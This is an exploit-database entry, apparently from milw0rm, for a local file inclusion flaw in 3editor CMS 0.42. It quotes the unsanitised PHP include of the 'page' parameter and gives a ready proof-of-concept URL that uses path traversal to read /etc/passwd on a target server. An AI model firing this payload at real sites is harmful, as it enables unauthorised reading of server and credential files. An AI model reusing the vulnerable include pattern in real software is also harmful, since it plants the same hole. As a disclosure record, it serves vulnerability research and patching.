EXPLOITS

3editor CMS 0.42 - 'index.php' Local File Inclusion

Author: 3l3ctric-Cracker
type: webapps
platform: php
port: 
date_added: 2006-12-21  
date_updated:   
verified: 1  
codes: OSVDB-32441;CVE-2006-6877  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2982.txt  

************************************************************************
*script Name: 3editor CMS (index.php) Local File Include Exploit       *
*Download:http://www.matteolucarelli.net/3editor/index.htm             *
*[Author      : Dr Max Virus                                           *
*[Contact     :drmaxvirus@w.cn                                         *
************************************************************************
*Bug & Problem                                                         *
*In file index.php Let's Take a look;                                  *
*if (!isset($_GET['page'])) include('phplib/treeedit.php');            *
*else include('phplib/'.$_GET['page']);                                *
************************************************************************
*As We can see the variable of page is not sanitized So attacker can   *
*apply his bug when:                                                   *
*register_globals=on                                                   *
************************************************************************
*POC Example:                                                          *
*http://[target]/[path]/index.php?page=../../../../../etc/passwd       *
************************************************************************
*Thx:str0ke -koray -ajann -Timq -r0ut3r -All my Friends                *
*special gr33ts:AsianEagle -The master -Kacper -Hotturk                *
************************************************************************

# milw0rm.com [2006-12-22]